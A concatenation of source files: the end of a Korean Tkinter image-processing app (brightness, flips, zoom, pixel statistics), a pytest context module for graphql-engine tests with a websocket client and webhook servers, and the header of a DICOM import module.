    still unimplemented stubs. Results are clamped to 0..255.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output geometry matches the input.
    outW = inW
    outH = inH
    outImage = []
    tmpList = []
    for i in range(outH):  # allocate the output buffer (zero-filled)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)

    if num == 1:  # brighten (addition)
        value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
        for i in range(inH) :
            for k in range(inW) :
                if inImage[i][k] + value > 255 :  # clamp the sum to 255
                    outImage[i][k] = 255
                else :
                    outImage[i][k] = inImage[i][k] + value
    elif num == 2:  # darken (subtraction)
        value = askinteger('어둡게하기', '어둡게할 값-->', minvalue=1, maxvalue=255)
        for i in range(inH):
            for k in range(inW):
                if inImage[i][k] - value < 0:  # clamp the difference to 0
                    outImage[i][k] = 0
                else:
                    outImage[i][k] = inImage[i][k] - value
    elif num == 3:  # brighten (multiplication) = sharpen contrast
        value = askinteger('밝게하기(뚜렷하게)', '밝게할 값-->', minvalue=1, maxvalue=255)
        for i in range(inH):
            for k in range(inW):
                if inImage[i][k] * value > 255:  # clamp the product to 255
                    outImage[i][k] = 255
                else:
                    outImage[i][k] = inImage[i][k] * value
    elif num == 4:  # darken (division) = fade
        value = askinteger('어둡게하기(희미하게)', '어둡게할 값-->', minvalue=1, maxvalue=255)
        for i in range(inH):
            for k in range(inW):
                # integer division keeps values integral (avoids float pixels)
                if inImage[i][k] // value > 255:
                    outImage[i][k] = 255
                elif inImage[i][k] // value < 0:
                    outImage[i][k] = 0
                else:
                    outImage[i][k] = inImage[i][k] // value
    elif num == 5:  # AND operation (not implemented yet)
        pass
    elif num == 6:  # OR operation (not implemented yet)
        pass
    elif num == 7:  # XOR operation (not implemented yet)
        pass
    elif num == 8:  # invert (not implemented yet)
        pass
    elif num == 9:  # gamma (not implemented yet)
        pass
    elif num == 10:  # parabola (cap) (not implemented yet)
        pass
    elif num == 11:  # parabola (cup) (not implemented yet)
        pass
    elif num == 12:  # binarization (not implemented yet)
        pass
    elif num == 13:  # range emphasis (not implemented yet)
        pass
    display()
#[데이터분석]
#[Data analysis]
def analyzeData(num) :
    """Show simple statistics about the input/output images in a popup.

    num == 1 : mean pixel value of the input and output images
    num == 2 : most/least frequent pixel value (by occurrence count)
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    if num == 1 :  # mean of the input and output images
        rawSum = 0
        for i in range(inH) :
            for k in range(inW) :
                rawSum += inImage[i][k]
        inRawAvg = int(rawSum / (inH*inW))
        rawSum = 0
        for i in range(outH) :
            for k in range(outW) :
                rawSum += outImage[i][k]
        outRawAvg = int(rawSum / (outH*outW))
        subWindow = Toplevel(window)  # child window of the main window
        subWindow.geometry('200x100')
        label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
        label1.pack()
        label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg))
        label2.pack()
    elif num == 2 :  # most/least frequent pixel values of input and output
        inDict, outDict = {}, {}
        # BUG FIX: the old code walked the *input* dimensions while also
        # indexing outImage, which raises IndexError whenever the output is
        # smaller than the input (e.g. right after zoomOut). Count each
        # image over its own dimensions instead.
        for i in range(inH):
            for k in range(inW):
                inDict[inImage[i][k]] = inDict.get(inImage[i][k], 0) + 1
        for i in range(outH):
            for k in range(outW):
                outDict[outImage[i][k]] = outDict.get(outImage[i][k], 0) + 1
        # NOTE(review): sorting is by occurrence count, so [-1]/[0] are the
        # most/least *frequent* (value, count) pairs — not the numeric
        # max/min the labels suggest. Confirm which was intended.
        insortList = sorted(inDict.items(), key=operator.itemgetter(1))
        outsortList = sorted(outDict.items(), key=operator.itemgetter(1))
        subWindow = Toplevel(window)  # child window of the main window
        subWindow.geometry('200x100')
        label1 = Label(subWindow, text="입력 시 최대값, 최소값 : " + str(insortList[-1]) + str(insortList[0]))
        label1.pack()
        label2 = Label(subWindow, text="출력 시 최대값, 최소값 : " + str(outsortList[-1]) + str(outsortList[0]))
        label2.pack()
        subWindow.mainloop()
#[기하학 처리]
#[Geometric transforms]
def upDown() :
    """Vertical flip: mirror the image across its horizontal center line."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output geometry matches the input.
    outW = inW
    outH = inH
    outImage = [[0] * outW for _ in range(outH)]
    for i in range(inH) :
        for k in range(inW) :
            # BUG FIX: the mirrored *row* index must be computed from the
            # height (outH), not the width (outW). The old code only worked
            # because the RAW images here happen to be square.
            outImage[outH - 1 - i][k] = inImage[i][k]
    display()
def LRReversalImage():
    """Horizontal flip: mirror the image across its vertical center line."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output geometry matches the input.
    outW = inW
    outH = inH
    outImage = [[0] * outW for _ in range(outH)]
    for i in range(inH) :
        for k in range(inW) :
            # BUG FIX: the mirrored *column* index must be computed from the
            # width (outW), not the height (outH). The old code only worked
            # because the RAW images here happen to be square.
            outImage[i][outW - 1 - k] = inImage[i][k]
    display()
#화면 이동 알고리즘
# Image panning
def panImage() :
    """Arm pan mode: the next click-drag on the window moves the image."""
    global panYN
    panYN = True
def mouseClick(event) :
    """Record the drag start point (only while pan mode is armed)."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN :
        return
    sx = event.x; sy = event.y;
def mouseDrop(event):
    """Finish a pan drag: shift the image by the drag vector and display it."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN:
        return
    ex = event.x; ey = event.y;
    # Drag vector; note the axis swap: screen x maps to columns (my) and
    # screen y maps to rows (mx).
    my = sx - ex ; mx = sy - ey
    # Output geometry matches the input.
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH):  # allocate the output buffer (zero-filled)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # The actual transform
    ############################
    for i in range(inH) :
        for k in range(inW) :
            # Copy only pixels whose shifted position stays inside the output.
            if 0<= i-mx <outH and 0<= k-my < outW :
                outImage[i-mx][k-my] = inImage[i][k]
    panYN = False  # pan mode is one-shot; disarm it
    display()
def zoomOut() :
    """Shrink the image by an integer factor chosen in a dialog (subsampling)."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
    # The output is 1/scale of the input in each dimension.
    outW = int(inW / scale)
    outH = int(inH / scale)
    outImage = [[0] * outW for _ in range(outH)]
    # Map every input pixel to its shrunken coordinate; pixels landing on the
    # same output cell simply overwrite each other (last one wins).
    for src_row in range(inH) :
        for src_col in range(inW) :
            outImage[int(src_row / scale)][int(src_col / scale)] = inImage[src_row][src_col]
    display()
def zoomInForW() :
    """Enlarge the image using forward mapping.

    Each source pixel is pushed to one destination pixel, so only every
    scale-th output pixel gets a value — the characteristic 'holes' of
    forward mapping (compare zoomInBackW).
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    scale = askinteger('화면확대-전방향', '화면확대(전방향)할 배수-->', minvalue=2, maxvalue=32)
    # Output is scale times the input in each dimension.
    outW = int(inW*scale); outH = int(inH*scale);
    outImage = []; tmpList = []
    for i in range(outH):  # allocate the output buffer (zero-filled)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # The actual transform
    ############################
    for i in range(inH) :
        for k in range(inW) :
            outImage[int(i * scale)][int(k * scale)] = inImage[i][k]  # forward map
    display()
def zoomInBackW():
    """Enlarge the image using backward mapping (nearest-neighbour sampling).

    Every destination pixel pulls its value from the corresponding source
    pixel, so the enlarged image has no holes (unlike zoomInForW).
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    scale = askinteger('화면확대-역방향', '화면확대(역방향)할 배수-->', minvalue=2, maxvalue=32)
    # Output is scale times the input in each dimension.
    outW = int(inW*scale)
    outH = int(inH*scale)
    # BUG FIX: backward mapping must visit every *destination* pixel. The
    # old loops ran over the input dimensions (inH x inW), leaving all but
    # the top-left corner of the enlarged image black.
    outImage = [[inImage[int(i / scale)][int(k / scale)] for k in range(outW)]
                for i in range(outH)]
    display()
#############
def RotationImage():  # rotation (work in progress)
    """Rotate the image by a user-chosen angle — not implemented yet."""
    pass
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
#
# scale = askinteger('이동', '이동 각도-->', minvalue=1, maxvalue=360)
#
# my = sx - ex;
# mx = sy - ey
#
# outW = inW;
# outH = inH;
# outImage = [];
# tmpList = []
# for i in range(outH): # 출력메모리 확보(0으로 초기화)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # 진짜 영상처리 알고리즘을 구현
# ############################
# for i in range(inH):
# for k in range(inW):
# if 0 <= i - mx < outH and 0 <= k - my < outW:
# outImage[i - mx][k - my] = inImage[i][k] #{작업 중}
#
# display()
# ######################
# # 화면 이동 알고리즘
# def panImage():
# global panYN
# panYN = True
#
# def mouseClick(event): # 동일 영상 알고리즘
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
# if not panYN:
# return
# sx = event.x;
# sy = event.y;
#
# def mouseDrop(event): # 동일 영상 알고리즘
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
# if not panYN:
# return
# ex = event.x;
# ey = event.y;
# my = sx - ex;
# mx = sy - ey
#
# # 중요! 출력메모리의 크기를 결정
# outW = inW;
# outH = inH;
# outImage = [];
# tmpList = []
# for i in range(outH): # 출력메모리 확보(0으로 초기화)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # 진짜 영상처리 알고리즘을 구현
# ############################
# for i in range(inH):
# for k in range(inW):
# if 0 <= i - mx < outH and 0 <= k - my < outW:
# outImage[i - mx][k - my] = inImage[i][k] # Q)?
# panYN = False
# display()
################
def SyntheticImage():
    """Blend/composite two images — not implemented yet."""
    pass
##
def saveFile() :
    """Save the output image back to a RAW file — not implemented yet."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    pass
def exitFile() :
    """Quit the application — not implemented yet."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    pass
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
# ###
# Cf. <variable glossary>
# window : the main Tk window
# canvas : widget the image is painted on
# paper : the PhotoImage holding the pixels
# filename : path of the image file to load
# inImage, inW, inH : source image (before processing), its width and height
# outImage, outW, outH : result image (after processing), its width and height
# panYN : True while pan (drag-to-move) mode is armed
# sx, sy, ex, ey : drag start x, start y, end x, end y
# ##
## Main code: build the window and menus, then start the Tk event loop
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 0.3')
# Mouse bindings drive the pan (drag-to-move) feature.
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)

mainMenu = Menu(window);window.config(menu=mainMenu)

fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)

pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=lambda: addImage(1))  # addition
pixelMenu.add_command(label='어둡게하기', command=lambda: addImage(2))  # subtraction
pixelMenu.add_command(label='밝게하기(뚜렷하게)', command=lambda: addImage(3))  # multiplication
pixelMenu.add_command(label='어둡게하기(희미하게)', command=lambda: addImage(4))  # division
# Entries 5-13 are stubs in addImage() and currently do nothing.
pixelMenu.add_command(label='AND연산', command=lambda: addImage(5))
pixelMenu.add_command(label="OR연산", command=lambda: addImage(6))
pixelMenu.add_command(label='XOR연산', command=lambda: addImage(7))
pixelMenu.add_command(label='반전', command=lambda: addImage(8))
pixelMenu.add_command(label='감마', command=lambda: addImage(9))
pixelMenu.add_command(label='파라볼라(Cap)', command=lambda: addImage(10))
pixelMenu.add_command(label='파라볼라(Cup)', command=lambda: addImage(11))
pixelMenu.add_command(label='이진화', command=lambda: addImage(12))
pixelMenu.add_command(label='범위강조', command=lambda: addImage(13))

geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='좌우반전', command=LRReversalImage)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
geoMenu.add_command(label='화면확대-전방향', command=zoomInForW)
geoMenu.add_command(label='화면확대-역방향(이웃 화소 보간법)', command=zoomInBackW)
geoMenu.add_command(label='회전', command=RotationImage)  # work in progress
geoMenu.add_command(label='영상 합성', command=SyntheticImage)  # work in progress

# BUG FIX: removed the unused duplicate 'analyseMenu = Menu(mainMenu)' — a
# typo twin of 'analyzeMenu' that was never attached to the menu bar.
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=lambda: analyzeData(1))
analyzeMenu.add_command(label='입출력 시 최대값, 최소값', command=lambda: analyzeData(2))

window.mainloop()
|
context.py | #!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
    """Module-level stand-in for the removed global ``pytest.config``."""
    pass
class HGECtxError(Exception):
    """Raised when the HGE test context fails to initialize or reset."""
    pass
class GQLWsClient():
    """GraphQL-over-websocket test client.

    Runs a websocket on a daemon thread; incoming frames are routed into a
    global queue plus one queue per in-flight query id, so tests can await
    events for a specific subscription independently.
    """

    def __init__(self, hge_ctx, endpoint):
        self.hge_ctx = hge_ctx
        self.ws_queue = queue.Queue(maxsize=-1)
        # Reuse the HGE URL but swap the scheme/path for the ws endpoint.
        self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
                                                         path=endpoint)
        self.create_conn()

    def create_conn(self):
        """(Re)initialize all connection state and start the socket thread."""
        self.ws_queue.queue.clear()
        self.ws_id_query_queues = dict()
        self.ws_active_query_ids = set()
        self.connected_event = threading.Event()
        self.init_done = False
        self.is_closing = False
        self.remote_closed = False
        self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
            on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
        self.wst = threading.Thread(target=self._ws.run_forever)
        self.wst.daemon = True
        self.wst.start()

    def recreate_conn(self):
        self.teardown()
        self.create_conn()

    def wait_for_connection(self, timeout=10):
        """Block until the socket has opened (fails on timeout or teardown)."""
        assert not self.is_closing
        assert self.connected_event.wait(timeout=timeout)

    def get_ws_event(self, timeout):
        """Pop the next non-query event (e.g. connection_ack) from the main queue."""
        return self.ws_queue.get(timeout=timeout)

    def has_ws_query_events(self, query_id):
        return not self.ws_id_query_queues[query_id].empty()

    def get_ws_query_event(self, query_id, timeout):
        """Pop the next event delivered for a specific query id."""
        return self.ws_id_query_queues[query_id].get(timeout=timeout)

    def send(self, frame):
        """Send a protocol frame, maintaining the per-query bookkeeping."""
        self.wait_for_connection()
        if frame.get('type') == 'stop':
            self.ws_active_query_ids.discard( frame.get('id') )
        elif frame.get('type') == 'start' and 'id' in frame:
            # Dedicated queue so this query's events can be awaited alone.
            self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
        self._ws.send(json.dumps(frame))

    def init_as_admin(self):
        """Run connection_init with the admin secret header (when configured)."""
        headers={}
        if self.hge_ctx.hge_key:
            headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
        self.init(headers)

    # NOTE(review): mutable default argument; it is only read here, but a
    # None sentinel would be the safer idiom.
    def init(self, headers={}):
        """Perform the connection_init handshake and await connection_ack."""
        payload = {'type': 'connection_init', 'payload': {}}

        if headers and len(headers) > 0:
            payload['payload']['headers'] = headers

        self.send(payload)
        ev = self.get_ws_event(3)
        assert ev['type'] == 'connection_ack', ev
        self.init_done = True

    def stop(self, query_id):
        """Stop a running query/subscription by id."""
        data = {'id': query_id, 'type': 'stop'}
        self.send(data)
        self.ws_active_query_ids.discard(query_id)

    def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
        """Generate a random query id not currently in use (retries on clash)."""
        new_id = ''.join(random.choice(chars) for _ in range(size))
        if new_id in self.ws_active_query_ids:
            return self.gen_id(size, chars)
        return new_id

    def send_query(self, query, query_id=None, headers={}, timeout=60):
        """Start a query and yield its events as a generator (never ends on its own)."""
        graphql.parse(query['query'])  # validate syntax before sending
        if headers and len(headers) > 0:
            #Do init If headers are provided
            self.init(headers)
        elif not self.init_done:
            self.init()
        if query_id == None:
            query_id = self.gen_id()
        frame = {
            'id': query_id,
            'type': 'start',
            'payload': query,
        }
        self.ws_active_query_ids.add(query_id)
        self.send(frame)
        while True:
            yield self.get_ws_query_event(query_id, timeout)

    def _on_open(self):
        # websocket-client callback: unblock wait_for_connection().
        if not self.is_closing:
            self.connected_event.set()

    def _on_message(self, message):
        # NOTE: make sure we preserve key ordering so we can test the ordering
        # properties in the graphql spec properly
        json_msg = json.loads(message, object_pairs_hook=OrderedDict)
        if 'id' in json_msg:
            query_id = json_msg['id']
            if json_msg.get('type') == 'stop':
                #Remove from active queries list
                self.ws_active_query_ids.discard( query_id )
            if not query_id in self.ws_id_query_queues:
                self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
            #Put event in the correponding query_queue
            self.ws_id_query_queues[query_id].put(json_msg)
        elif json_msg['type'] != 'ka':  # drop keep-alive frames
            #Put event in the main queue
            self.ws_queue.put(json_msg)

    def _on_close(self):
        self.remote_closed = True
        self.init_done = False

    def teardown(self):
        """Close the socket (if the peer hasn't already) and join its thread."""
        self.is_closing = True
        if not self.remote_closed:
            self._ws.close()
        self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
    """HTTP handler backing Hasura action tests.

    Dispatches POSTs by path to small action implementations which call
    back into HGE via ``self.hge_ctx`` (set as a class attribute by
    ActionsWebhookServer).
    """

    def do_GET(self):
        # Health-check style endpoint: always 200 with an empty body.
        self.send_response(HTTPStatus.OK)
        self.end_headers()

    def do_POST(self):
        """Parse the JSON body and dispatch to the action named by the path."""
        content_len = self.headers.get('Content-Length')
        req_body = self.rfile.read(int(content_len)).decode("utf-8")
        self.req_json = json.loads(req_body)
        req_headers = self.headers
        req_path = self.path
        self.log_message(json.dumps(self.req_json))

        if req_path == "/create-user":
            resp, status = self.create_user()
            self._send_response(status, resp)

        elif req_path == "/create-users":
            resp, status = self.create_users()
            self._send_response(status, resp)

        elif req_path == "/invalid-response":
            # Deliberately not a JSON object, to exercise HGE's error path.
            self._send_response(HTTPStatus.OK, "some-string")

        elif req_path == "/mirror-action":
            resp, status = self.mirror_action()
            self._send_response(status, resp)

        else:
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()

    def create_user(self):
        """Validate the email, then insert one user through HGE.

        Returns (response_body, http_status).
        """
        email_address = self.req_json['input']['email']
        name = self.req_json['input']['name']

        if not self.check_email(email_address):
            response = {
                'message': 'Given email address is not valid',
                'code': 'invalid-email'
            }
            return response, HTTPStatus.BAD_REQUEST

        gql_query = '''
        mutation ($email: String! $name: String!) {
          insert_user_one(object: {email: $email, name: $name}){
            id
          }
        }
        '''
        query = {
            'query': gql_query,
            'variables': {
                'email': email_address,
                'name': name
            }
        }
        code, resp = self.execute_query(query)

        if code != 200 or 'data' not in resp:
            response = {
                'message': 'GraphQL query execution failed',
                'code': 'unexpected'
            }
            return response, HTTPStatus.BAD_REQUEST

        response = resp['data']['insert_user_one']
        return response, HTTPStatus.OK

    def create_users(self):
        """Validate every email, then bulk-insert users through HGE.

        Returns (response_body, http_status).
        """
        inputs = self.req_json['input']['users']
        for input in inputs:
            email_address = input['email']
            if not self.check_email(email_address):
                response = {
                    'message': 'Email address is not valid: ' + email_address,
                    'code': 'invalid-email'
                }
                return response, HTTPStatus.BAD_REQUEST

        gql_query = '''
        mutation ($insert_inputs: [user_insert_input!]!){
          insert_user(objects: $insert_inputs){
            returning{
              id
            }
          }
        }
        '''
        query = {
            'query': gql_query,
            'variables': {
                'insert_inputs': inputs
            }
        }
        code, resp = self.execute_query(query)

        if code != 200 or 'data' not in resp:
            response = {
                'message': 'GraphQL query execution failed',
                'code': 'unexpected'
            }
            return response, HTTPStatus.BAD_REQUEST

        response = resp['data']['insert_user']['returning']
        return response, HTTPStatus.OK

    def mirror_action(self):
        # Echo the action argument straight back.
        response = self.req_json['input']['arg']
        return response, HTTPStatus.OK

    def check_email(self, email):
        """Return a match object when *email* looks like a valid address."""
        # NOTE(review): pattern should be a raw string (r'...') — '\w'/'\.'
        # are invalid escape sequences in a plain string literal and will
        # warn on newer Pythons. Behavior is unchanged today.
        regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
        return re.search(regex,email)

    def execute_query(self, query):
        """Run *query* against HGE (with admin secret when configured)."""
        headers = {}
        admin_secret = self.hge_ctx.hge_key
        if admin_secret is not None:
            headers['X-Hasura-Admin-Secret'] = admin_secret
        code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
        self.log_message(json.dumps(resp))
        return code, resp

    def _send_response(self, status, body):
        """Serialize *body* as JSON and send it with the given status."""
        self.send_response(status)
        self.send_header('Content-Type', 'application/json')
        self.send_header('Set-Cookie', 'abcd')
        self.end_headers()
        self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
    """HTTP server for action tests, wired to ActionsWebhookHandler."""

    def __init__(self, hge_ctx, server_address):
        # Give the handler class access to the test context before serving.
        ActionsWebhookHandler.hge_ctx = hge_ctx
        super().__init__(server_address, ActionsWebhookHandler)

    def server_bind(self):
        # Allow rebinding the same port immediately after a previous run.
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
    """Webhook sink for event-trigger tests.

    Routes deliveries into the owning server's queues: /fail and
    /timeout_short go to error_queue, everything else to resp_queue.
    """

    def do_GET(self):
        # Health-check style endpoint: always 200 with an empty body.
        self.send_response(HTTPStatus.OK)
        self.end_headers()

    def do_POST(self):
        content_len = self.headers.get('Content-Length')
        req_body = self.rfile.read(int(content_len)).decode("utf-8")
        req_json = json.loads(req_body)
        req_headers = self.headers
        req_path = self.path
        self.log_message(json.dumps(req_json))
        if req_path == "/fail":
            # Simulate a failing webhook: 500 and record in the error queue.
            self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
            self.end_headers()
            self.server.error_queue.put({"path": req_path,
                                         "body": req_json,
                                         "headers": req_headers})
        elif req_path == "/timeout_short":
            # Sleep longer than the trigger's (short) timeout: the delivery
            # is expected to be counted as an error on the HGE side.
            time.sleep(5)
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()
            self.server.error_queue.put({"path": req_path,
                                         "body": req_json,
                                         "headers": req_headers})
        elif req_path == "/timeout_long":
            # Same delay, but within the trigger's (long) timeout: success.
            time.sleep(5)
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()
            self.server.resp_queue.put({"path": req_path,
                                        "body": req_json,
                                        "headers": req_headers})
        else:
            # Default: accept the delivery and record it as a success.
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()
            self.server.resp_queue.put({"path": req_path,
                                        "body": req_json,
                                        "headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
    """Handle requests in a separate thread (one thread per request,
    via socketserver.ThreadingMixIn)."""
class EvtsWebhookServer(ThreadedHTTPServer):
    """Threaded webhook sink used by event-trigger tests.

    Successful deliveries land in ``resp_queue`` (maxsize=1, so a second
    delivery blocks until the test consumes the first), error-path
    deliveries in ``error_queue``.
    """

    def __init__(self, server_address):
        self.resp_queue = queue.Queue(maxsize=1)
        self.error_queue = queue.Queue()
        super().__init__(server_address, EvtsWebhookHandler)

    def server_bind(self):
        # Allow rebinding the same port immediately after a previous run.
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.server_address)

    def get_event(self, timeout):
        """Pop the next successful delivery (blocks up to *timeout* seconds)."""
        return self.resp_queue.get(timeout=timeout)

    def get_error_queue_size(self):
        """Drain the error queue and return how many failed deliveries it held."""
        sz = 0
        while not self.error_queue.empty():
            self.error_queue.get()
            sz = sz + 1
        return sz

    def teardown(self):
        """Stop serving and release the listening socket.

        BUG FIX: the old body referenced attributes that are never set on
        this class (evt_trggr_httpd, graphql_server, gql_srvr_thread,
        evt_trggr_web_server — copied from another fixture), so calling it
        always raised AttributeError. Shut down this HTTP server itself.
        """
        self.shutdown()
        self.server_close()
class HGECtxGQLServer:
    """Runs the auxiliary GraphQL test server on a background thread."""

    def __init__(self, hge_urls):
        # start the graphql server
        self.graphql_server = graphql_server.create_server('127.0.0.1', 5000)
        self.hge_urls = graphql_server.set_hge_urls(hge_urls)
        self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
        self.gql_srvr_thread.start()

    def teardown(self):
        """Stop the server and wait for its thread to exit."""
        graphql_server.stop_server(self.graphql_server)
        self.gql_srvr_thread.join()
class HGECtx:
    """Test context around a running graphql-engine (HGE) instance.

    Bundles an HTTP session against the HGE URL, a SQLAlchemy engine for its
    Postgres database, a websocket client, and the relevant pytest options.
    """

    def __init__(self, hge_url, pg_url, config):
        self.http = requests.Session()
        self.hge_key = config.getoption('--hge-key')
        self.hge_url = hge_url
        self.pg_url = pg_url
        self.hge_webhook = config.getoption('--hge-webhook')
        hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
        if hge_jwt_key_file is None:
            self.hge_jwt_key = None
        else:
            with open(hge_jwt_key_file) as f:
                self.hge_jwt_key = f.read()
        self.hge_jwt_conf = config.getoption('--hge-jwt-conf')

        self.webhook_insecure = config.getoption('--test-webhook-insecure')
        self.metadata_disabled = config.getoption('--test-metadata-disabled')
        self.may_skip_test_teardown = False

        self.engine = create_engine(self.pg_url)
        self.meta = MetaData()

        self.ws_read_cookie = config.getoption('--test-ws-init-cookie')

        self.hge_scale_url = config.getoption('--test-hge-scale-url')
        self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')

        self.ws_client = GQLWsClient(self, '/v1/graphql')

        # HGE version: a VERSION env var (e.g. set in CI) wins over the
        # repo's get-version.sh script output.
        result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
        env_version = os.getenv('VERSION')
        self.version = env_version if env_version else result.stdout.decode('utf-8').strip()

        # Reset the schema unless metadata APIs are disabled or setup skipped
        if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
            try:
                st_code, resp = self.v1q_f('queries/clear_db.yaml')
            except requests.exceptions.RequestException as e:
                self.teardown()
                raise HGECtxError(repr(e))
            assert st_code == 200, resp

        # Postgres version, e.g. 110005 for 11.5
        pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
        self.pg_version = int(pg_version_text)

    def reflect_tables(self):
        """Load table definitions from the database into self.meta."""
        self.meta.reflect(bind=self.engine)

    def anyq(self, u, q, h):
        """POST query ``q`` to HGE endpoint ``u`` with headers ``h``.

        Returns (status_code, ordered JSON body, response headers) -- the
        response headers are returned so tests can read the request id.
        """
        resp = self.http.post(
            self.hge_url + u,
            json=q,
            headers=h
        )
        # NOTE: make sure we preserve key ordering so we can test the ordering
        # properties in the graphql spec properly
        return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers

    def sql(self, q):
        """Execute raw SQL against the Postgres database and return the result."""
        conn = self.engine.connect()
        res = conn.execute(q)
        conn.close()
        return res

    def v1q(self, q, headers=None):
        """POST query ``q`` to /v1/query; returns (status_code, ordered JSON).

        ``headers`` previously used a mutable default ({}); use None and copy
        so the caller's dict is never mutated and no state leaks across calls.
        """
        h = {} if headers is None else headers.copy()
        if self.hge_key is not None:
            h['X-Hasura-Admin-Secret'] = self.hge_key
        resp = self.http.post(
            self.hge_url + "/v1/query",
            json=q,
            headers=h
        )
        # NOTE: make sure we preserve key ordering so we can test the ordering
        # properties in the graphql spec properly
        return resp.status_code, resp.json(object_pairs_hook=OrderedDict)

    def v1q_f(self, fn):
        """Run the /v1/query request stored in YAML file ``fn``."""
        with open(fn) as f:
            # NOTE: preserve ordering with ruamel
            yml = yaml.YAML()
            return self.v1q(yml.load(f))

    def teardown(self):
        """Close the HTTP session and dispose of the SQLAlchemy engine."""
        self.http.close()
        self.engine.dispose()
|
import_dicom.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# models.import_dicom.py
"""
Classes for the DICOM import GUI and threading
"""
# Copyright (c) 2016-2019 Dan Cutright
# This file is part of DVH Analytics, released under a BSD license.
# See the file LICENSE included with this distribution, also
# available at https://github.com/cutright/DVH-Analytics
import wx
